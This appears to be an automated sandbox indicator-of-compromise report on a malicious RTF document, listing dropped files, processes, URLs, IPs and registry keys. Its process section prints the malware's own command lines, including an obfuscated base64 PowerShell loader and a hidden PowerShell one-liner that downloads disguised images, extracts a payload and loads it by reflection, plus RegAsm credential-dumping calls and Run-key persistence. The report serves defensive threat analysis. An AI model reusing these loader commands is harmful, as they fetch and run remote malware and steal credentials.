IOC Report
SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtf

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtf
Rich Text Format data, version 1
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CA543F72-2079-494B-907E-1CAAB2B57148}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
 malicious
C:\Users\user\AppData\Roaming\imageloverkissingme.vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
 malicious
C:\ProgramData\APR.vbs
Non-ISO extended-ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\imagepixelsample[1].jpg
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\5Fhtg[1].txt
Unicode text, UTF-8 text, with very long lines (11222), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EE3691E5-AFB0-4972-B6B0-4CAA9314E9EA}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EEFA525D-3ADF-4C81-95AE-9C3533004464}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\53qn2bhw.rtg.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhvA055.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x35970313, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\go12v5zc.opy.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\hp0nyqdh.nh4.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jmqqjhvgefxtcp
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\kyvrotam.00u.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\lhyupymk.1um.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\mu4j03a2.c0e.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:15 2023, mtime=Fri Aug 11 15:42:15 2023, atime=Tue Apr 16 12:28:08 2024, length=64639, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$curiteInfo.com.Exploit.ShellCode.69.24616.9282.rtf
data
dropped
There are 13 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\imageloverkissingme.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBSDgTreFDgTreDgTreQQDgTrevDgTreDDgTreDgTreNQDgTrevDgTreDDgTreDgTreMQDgTreuDgTreDYDgTreMwDgTreuDgTreDQDgTreOQDgTreuDgTreDMDgTreMgDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQQBQDgTreFIDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\certutil.exe
"C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RPA/05/01.63.49.32//:ptth' , '1' , 'C:\ProgramData\' , 'APR','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\APR.vbs
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmqqjhvgefxtcp"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lpvikznianpgedarwi"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lpvikznianpgedarwi"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lpvikznianpgedarwi"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjatlsycnwhlpjwdntorp"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjatlsycnwhlpjwdntorp"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\APR.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\APR.vbs"
malicious
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://23.94.36.10/50/APR.txt
23.94.36.10
 malicious
https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500
172.67.215.45
 malicious
http://23.94.36.10/50/imagepixelsample.jpeg
23.94.36.10
 malicious
http://geoplugin.net/json.gp/C
unknown
 malicious
107.175.229.141
malicious
http://geoplugin.net/json.gp
178.237.33.50
 malicious
https://uploaddeimagens.com.br/images/00
unknown
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469
172.67.215.45
 malicious
http://23.94.36.10/50/imagepixelsample.jpeguuC:
unknown
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.com/iK
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
https://paste.ee/d/5Fhtgg
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://23.94.36.10
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
https://paste.ee/e
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://23.94.36.10/50/imagepixelsample.jpegj
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
https://paste.ee/
unknown
https://paste.ee/d/5Fhtg
104.21.84.67
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
https://www.google.com;
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://lesferch.github.io/DesktopPic
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://analytics.paste.ee;
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
https://themes.googleusercontent.com
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://geoplugin.net/json.gpPr
unknown
http://www.ebuddy.com
unknown
There are 76 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
uploaddeimagens.com.br
172.67.215.45
 malicious
paste.ee
172.67.187.200
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
23.94.36.10
unknown
United States
malicious
104.21.84.67
unknown
United States
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious
107.175.229.141
unknown
United States
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_CURRENT_USER\Software\Rmc-VOCL75
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-VOCL75
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-VOCL75
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
,o.
